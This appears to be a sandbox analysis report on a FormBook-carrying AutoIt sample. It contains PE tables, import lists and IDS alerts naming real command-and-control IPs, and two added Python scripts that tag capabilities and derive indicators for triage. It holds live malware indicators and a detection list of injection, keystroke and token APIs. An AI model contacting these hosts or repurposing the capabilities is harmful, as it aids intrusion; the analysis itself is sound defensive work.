                                              sub ecx, 08h
                                              lea esi, dword ptr [esi+08h]
                                              movq qword ptr [edi], xmm1
                                              lea edi, dword ptr [edi+08h]
                                              test esi, 00000007h
                                              je 00007F3B60827185h
                                              bt esi, 03h
                                              Programming Language:
                                              • [ASM] VS2013 build 21005
                                              • [ C ] VS2013 build 21005
                                              • [C++] VS2013 build 21005
                                              • [ C ] VS2008 SP1 build 30729
                                              • [IMP] VS2008 SP1 build 30729
                                              • [ASM] VS2013 UPD5 build 40629
                                              • [RES] VS2013 build 21005
                                              • [LNK] VS2013 UPD5 build 40629
                                               Name | Virtual Address | Virtual Size | Is in Section
                                               IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                               IMAGE_DIRECTORY_ENTRY_IMPORT | 0xbc0cc | 0x17c | .rdata
                                               IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc8000 | 0x52d84 | .rsrc
                                               IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                               IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                               IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x11b000 | 0x7134 | .reloc
                                               IMAGE_DIRECTORY_ENTRY_DEBUG | 0x92bc0 | 0x1c | .rdata
                                               IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                               IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                               IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                               IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa4b50 | 0x40 | .rdata
                                               IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                               IMAGE_DIRECTORY_ENTRY_IAT | 0x8f000 | 0x884 | .rdata
                                               IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                               IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                               IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                               Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                               .text | 0x1000 | 0x8dfdd | 0x8e000 | 310e36668512d53489c005622bb1b4a9 | False | 0.5735602580325704 | data | 6.675248351711057 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                               .rdata | 0x8f000 | 0x2fd8e | 0x2fe00 | 748cf1ab2605ce1fd72d53d912abb68f | False | 0.32828818537859006 | data | 5.763244005758284 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                               .data | 0xbf000 | 0x8f74 | 0x5200 | aae9601d920f07080bdfadf43dfeff12 | False | 0.1017530487804878 | data | 1.1963819235530628 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                               .rsrc | 0xc8000 | 0x52d84 | 0x52e00 | da05bf5d14c02c30eab94f8aa935ab87 | False | 0.9232183257918553 | data | 7.885270801575352 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                               .reloc | 0x11b000 | 0x7134 | 0x7200 | f04128ad0f87f42830e4a6cdbc38c719 | False | 0.7617530153508771 | data | 6.783955557128661 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                               Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                               RT_ICON | 0xc84a0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
                                               RT_ICON | 0xc85c8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
                                               RT_ICON | 0xc88b0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
                                               RT_ICON | 0xc89d8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
                                               RT_ICON | 0xc9880 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
                                               RT_ICON | 0xca128 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
                                               RT_ICON | 0xca690 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
                                               RT_ICON | 0xccc38 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
                                               RT_ICON | 0xcdce0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
                                               RT_STRING | 0xce148 | 0x594 | data | English | Great Britain | 0.3333333333333333
                                               RT_STRING | 0xce6dc | 0x68a | data | English | Great Britain | 0.2747909199522103
                                               RT_STRING | 0xced68 | 0x490 | data | English | Great Britain | 0.3715753424657534
                                               RT_STRING | 0xcf1f8 | 0x5fc | data | English | Great Britain | 0.3087467362924282
                                               RT_STRING | 0xcf7f4 | 0x65c | data | English | Great Britain | 0.34336609336609336
                                               RT_STRING | 0xcfe50 | 0x466 | data | English | Great Britain | 0.3605683836589698
                                               RT_STRING | 0xd02b8 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
                                               RT_RCDATA | 0xd0410 | 0x4a41c | data | | | 1.0003320664395903
                                               RT_GROUP_ICON | 0x11a82c | 0x76 | data | English | Great Britain | 0.6610169491525424
                                               RT_GROUP_ICON | 0x11a8a4 | 0x14 | data | English | Great Britain | 1.15
                                               RT_VERSION | 0x11a8b8 | 0xdc | data | English | Great Britain | 0.6181818181818182
                                               RT_MANIFEST | 0x11a994 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
                                              DLLImport
                                              WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                              VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                              WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                              COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                              MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                              WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                              PSAPI.DLLGetProcessMemoryInfo
                                              IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                              USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                              UxTheme.dllIsThemeActive
                                              KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, 
SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll: AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll: StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll: GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll: GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll: DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll: CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll: LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
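The import tables above are what the static part of a sandbox verdict is built from: an API such as BlockInput, keybd_event or InitiateSystemShutdownExW is enough to raise a "contains functionality to ..." line in the overview. The following is an added example, not code from the report or from Joe Sandbox, that performs that kind of import-based tagging over a subset of this sample's imports. The capability groups are this example's own and are deliberately coarse. One caveat a triager should keep in mind: the report flags the binary as a compiled AutoIt script, and the import set shown here (BlockInput, SHEmptyRecycleBinW, CreateProcessWithLogonW, InitiateSystemShutdownExW, AngleArc, PolyDraw) is consistent with the AutoIt interpreter's own import table, so these tags describe what the runtime can do, not what the embedded script or the injected FormBook payload actually does.

```python
# Added example (not part of the Joe Sandbox report): tag a PE import list with
# coarse behavioural capabilities, the way import-based static signatures do.
# The API names in SAMPLE_IMPORTS are copied from the report's import tables;
# the CAPABILITIES groups are this example's own assumption, not sandbox rules.
from collections import defaultdict

# Capability -> APIs that indicate it. Assumption: a single matching import is
# enough to raise the tag, which is how most import-based triage behaves.
CAPABILITIES = {
    "input-blocking":     {"BlockInput"},
    "input-simulation":   {"keybd_event", "mouse_event", "SendInput"},
    "keystroke-reading":  {"GetAsyncKeyState", "GetKeyState", "GetKeyboardState"},
    "clipboard-access":   {"OpenClipboard", "GetClipboardData", "SetClipboardData"},
    "registry-write":     {"RegSetValueExW", "RegCreateKeyExW", "RegDeleteValueW"},
    "token-manipulation": {"AdjustTokenPrivileges", "DuplicateTokenEx", "OpenProcessToken"},
    "run-as-other-user":  {"CreateProcessAsUserW", "CreateProcessWithLogonW", "LogonUserW"},
    "system-shutdown":    {"ExitWindowsEx", "InitiateSystemShutdownExW"},
    "shell-execute":      {"ShellExecuteW", "ShellExecuteExW"},
}


def parse_import_table(text):
    """Parse lines of the form 'DLL: Func1, Func2, ...' into {dll: set(funcs)}.

    DLL names are lower-cased because PE import directory entries are not
    case-normalised and the same DLL is often written both ways.
    """
    imports = defaultdict(set)
    for line in text.strip().splitlines():
        dll, sep, funcs = line.partition(":")
        if not sep:
            continue  # not an import line
        for func in funcs.split(","):
            func = func.strip()
            if func:
                imports[dll.strip().lower()].add(func)
    return dict(imports)


def tag_capabilities(imports):
    """Return {capability: sorted list of matching APIs} for each capability hit."""
    all_funcs = set().union(*imports.values())
    hits = {}
    for cap, apis in CAPABILITIES.items():
        matched = sorted(apis & all_funcs)
        if matched:
            hits[cap] = matched
    return hits


# Constructed input: a subset of the sample's import table as listed in the report.
SAMPLE_IMPORTS = """
USER32.dll: BlockInput, keybd_event, mouse_event, SendInput, GetAsyncKeyState, GetKeyState, OpenClipboard, GetClipboardData, ExitWindowsEx, MessageBoxW
ADVAPI32.dll: RegSetValueExW, RegCreateKeyExW, AdjustTokenPrivileges, CreateProcessAsUserW, CreateProcessWithLogonW, LogonUserW, InitiateSystemShutdownExW
SHELL32.dll: ShellExecuteW, ShellExecuteExW, SHEmptyRecycleBinW
"""

if __name__ == "__main__":
    for cap, apis in tag_capabilities(parse_import_table(SAMPLE_IMPORTS)).items():
        print(f"{cap:20s} {', '.join(apis)}")
```

Run against the full tables above it raises every one of the "contains functionality" lines the overview lists that derive from imports; run against a known-clean AutoIt-compiled utility it raises the same ones, which is why the sandbox's verdict here rests on the dynamic signatures (the Yara hit, process injection, the CnC alerts) rather than on this table.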
Language of compilation system | Country where language is spoken
English | Great Britain
Timestamp | Protocol | SID | Signature | Source Port | Dest Port | Source IP | Dest IP
2024-07-21T13:31:10.500548+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 49704 | 80 | 192.168.2.7 | 3.33.130.190
2024-07-21T13:31:39.802184+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 49709 | 80 | 192.168.2.7 | 76.223.67.189
2024-07-21T13:31:53.199532+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 49713 | 80 | 192.168.2.7 | 3.33.130.190
2024-07-21T13:32:06.994854+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 49717 | 80 | 192.168.2.7 | 188.114.97.3
2024-07-21T13:32:21.613906+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 49721 | 80 | 192.168.2.7 | 103.168.172.37
2024-07-21T13:32:39.957553+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 49725 | 80 | 192.168.2.7 | 188.114.96.3
2024-07-21T13:32:53.501283+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 49729 | 80 | 192.168.2.7 | 203.161.41.207
2024-07-21T13:33:06.685839+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 49733 | 80 | 192.168.2.7 | 84.32.84.32
2024-07-21T13:33:19.877840+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 49737 | 80 | 192.168.2.7 | 13.248.169.48
2024-07-21T13:33:33.452707+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 49741 | 80 | 192.168.2.7 | 148.135.97.125
2024-07-21T13:33:46.714145+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 49745 | 80 | 192.168.2.7 | 3.33.130.190
2024-07-21T13:34:00.273875+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 49749 | 80 | 192.168.2.7 | 3.33.130.190
2024-07-21T13:34:32.188050+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 49753 | 80 | 192.168.2.7 | 84.32.84.32
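Every alert in the table is the same Emerging Threats rule (SID 2050745, FormBook CnC check-in over plain HTTP to port 80), fired against nine distinct destination hosts roughly 13 seconds apart, with 3.33.130.190 and 84.32.84.32 revisited. That is the sample cycling through its configured C2 host list, and in the packet table that follows each alert's source port is the last of a run of four consecutive connections to the same host (49706-49709 to 76.223.67.189, 49710-49713 to 3.33.130.190, and so on), so the rule matches one request per burst rather than every connection. The following is an added example, not code from the report or from Joe Sandbox, that parses these rows into an IOC list and the check-in cadence; the alert rows are copied from the table, the "a | b | c" field layout is this example's own convention, and only the standard library is used.

```python
# Added example (not part of the Joe Sandbox report): derive the C2 IOC set and
# the check-in cadence from the report's IDS alert table. Standard library only.
import re
from collections import Counter
from datetime import datetime

# Constructed input: the 13 alert rows from the report, in the order listed there.
ALERTS = """\
2024-07-21T13:32:06.994854+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 49717 | 80 | 192.168.2.7 | 188.114.97.3
2024-07-21T13:33:33.452707+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 49741 | 80 | 192.168.2.7 | 148.135.97.125
2024-07-21T13:34:00.273875+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 49749 | 80 | 192.168.2.7 | 3.33.130.190
2024-07-21T13:32:39.957553+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 49725 | 80 | 192.168.2.7 | 188.114.96.3
2024-07-21T13:32:53.501283+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 49729 | 80 | 192.168.2.7 | 203.161.41.207
2024-07-21T13:31:53.199532+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 49713 | 80 | 192.168.2.7 | 3.33.130.190
2024-07-21T13:33:46.714145+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 49745 | 80 | 192.168.2.7 | 3.33.130.190
2024-07-21T13:32:21.613906+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 49721 | 80 | 192.168.2.7 | 103.168.172.37
2024-07-21T13:31:10.500548+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 49704 | 80 | 192.168.2.7 | 3.33.130.190
2024-07-21T13:33:06.685839+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 49733 | 80 | 192.168.2.7 | 84.32.84.32
2024-07-21T13:34:32.188050+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 49753 | 80 | 192.168.2.7 | 84.32.84.32
2024-07-21T13:31:39.802184+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 49709 | 80 | 192.168.2.7 | 76.223.67.189
2024-07-21T13:33:19.877840+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 49737 | 80 | 192.168.2.7 | 13.248.169.48
"""

# One row: timestamp | proto | sid | signature | sport | dport | src ip | dst ip.
# The signature is matched lazily because it contains spaces and parentheses.
ROW = re.compile(r"^(\S+) \| (\w+) \| (\d+) \| (.+?) \| (\d+) \| (\d+) \| (\S+) \| (\S+)$")


def parse_alerts(text):
    """Parse alert rows into dicts and return them sorted by timestamp."""
    rows = []
    for line in text.strip().splitlines():
        m = ROW.match(line.strip())
        if not m:
            raise ValueError(f"unparseable alert row: {line!r}")
        ts, proto, sid, sig, sport, dport, sip, dip = m.groups()
        rows.append({
            # %z accepts the "+0200" offset form used in the report on every Python 3.
            "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z"),
            "proto": proto, "sid": int(sid), "signature": sig,
            "sport": int(sport), "dport": int(dport), "src": sip, "dst": dip,
        })
    return sorted(rows, key=lambda r: r["ts"])


def c2_candidates(rows):
    """Distinct (dst IP, dst port) pairs that triggered a check-in alert."""
    return sorted({(r["dst"], r["dport"]) for r in rows})


def checkin_intervals(rows):
    """Seconds between consecutive alerts, in time order."""
    ts = [r["ts"] for r in rows]
    return [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]


def summarize(rows):
    """IOC list plus cadence statistics for a sorted list of alert rows."""
    iv = checkin_intervals(rows)
    return {
        "alerts": len(rows),
        "sids": sorted({r["sid"] for r in rows}),
        "hosts": c2_candidates(rows),
        "per_host": dict(Counter(r["dst"] for r in rows)),
        "min_interval_s": round(min(iv), 2),
        "median_interval_s": round(sorted(iv)[len(iv) // 2], 2),
        "max_interval_s": round(max(iv), 2),
    }


if __name__ == "__main__":
    summary = summarize(parse_alerts(ALERTS))
    for key, value in summary.items():
        print(f"{key:18s} {value}")
```

The median interval is what a network-side detection should key on: a host that reaches a fresh external IP on port 80 every 13 seconds or so, each time from a new ephemeral port, is the pattern here, independent of which of the nine addresses is the live C2 and which are not.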
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 21, 2024 13:31:10.011270046 CEST | 49704 | 80 | 192.168.2.7 | 3.33.130.190
Jul 21, 2024 13:31:10.018220901 CEST | 80 | 49704 | 3.33.130.190 | 192.168.2.7
Jul 21, 2024 13:31:10.018337011 CEST | 49704 | 80 | 192.168.2.7 | 3.33.130.190
Jul 21, 2024 13:31:10.021895885 CEST | 49704 | 80 | 192.168.2.7 | 3.33.130.190
Jul 21, 2024 13:31:10.030376911 CEST | 80 | 49704 | 3.33.130.190 | 192.168.2.7
Jul 21, 2024 13:31:10.500219107 CEST | 80 | 49704 | 3.33.130.190 | 192.168.2.7
Jul 21, 2024 13:31:10.500431061 CEST | 80 | 49704 | 3.33.130.190 | 192.168.2.7
Jul 21, 2024 13:31:10.500547886 CEST | 49704 | 80 | 192.168.2.7 | 3.33.130.190
Jul 21, 2024 13:31:10.512511969 CEST | 49704 | 80 | 192.168.2.7 | 3.33.130.190
Jul 21, 2024 13:31:10.517385960 CEST | 80 | 49704 | 3.33.130.190 | 192.168.2.7
Jul 21, 2024 13:31:30.610490084 CEST | 49706 | 80 | 192.168.2.7 | 76.223.67.189
Jul 21, 2024 13:31:30.615523100 CEST | 80 | 49706 | 76.223.67.189 | 192.168.2.7
Jul 21, 2024 13:31:30.615607023 CEST | 49706 | 80 | 192.168.2.7 | 76.223.67.189
Jul 21, 2024 13:31:30.617557049 CEST | 49706 | 80 | 192.168.2.7 | 76.223.67.189
Jul 21, 2024 13:31:30.622436047 CEST | 80 | 49706 | 76.223.67.189 | 192.168.2.7
Jul 21, 2024 13:31:31.076571941 CEST | 80 | 49706 | 76.223.67.189 | 192.168.2.7
Jul 21, 2024 13:31:31.076673031 CEST | 49706 | 80 | 192.168.2.7 | 76.223.67.189
Jul 21, 2024 13:31:32.129621029 CEST | 49706 | 80 | 192.168.2.7 | 76.223.67.189
Jul 21, 2024 13:31:32.134776115 CEST | 80 | 49706 | 76.223.67.189 | 192.168.2.7
Jul 21, 2024 13:31:33.148159027 CEST | 49707 | 80 | 192.168.2.7 | 76.223.67.189
Jul 21, 2024 13:31:33.153172970 CEST | 80 | 49707 | 76.223.67.189 | 192.168.2.7
Jul 21, 2024 13:31:33.153278112 CEST | 49707 | 80 | 192.168.2.7 | 76.223.67.189
Jul 21, 2024 13:31:33.155786037 CEST | 49707 | 80 | 192.168.2.7 | 76.223.67.189
Jul 21, 2024 13:31:33.160717010 CEST | 80 | 49707 | 76.223.67.189 | 192.168.2.7
Jul 21, 2024 13:31:33.623838902 CEST | 80 | 49707 | 76.223.67.189 | 192.168.2.7
Jul 21, 2024 13:31:33.623975039 CEST | 49707 | 80 | 192.168.2.7 | 76.223.67.189
Jul 21, 2024 13:31:34.660857916 CEST | 49707 | 80 | 192.168.2.7 | 76.223.67.189
Jul 21, 2024 13:31:34.666050911 CEST | 80 | 49707 | 76.223.67.189 | 192.168.2.7
Jul 21, 2024 13:31:35.679866076 CEST | 49708 | 80 | 192.168.2.7 | 76.223.67.189
Jul 21, 2024 13:31:36.023798943 CEST | 80 | 49708 | 76.223.67.189 | 192.168.2.7
Jul 21, 2024 13:31:36.023922920 CEST | 49708 | 80 | 192.168.2.7 | 76.223.67.189
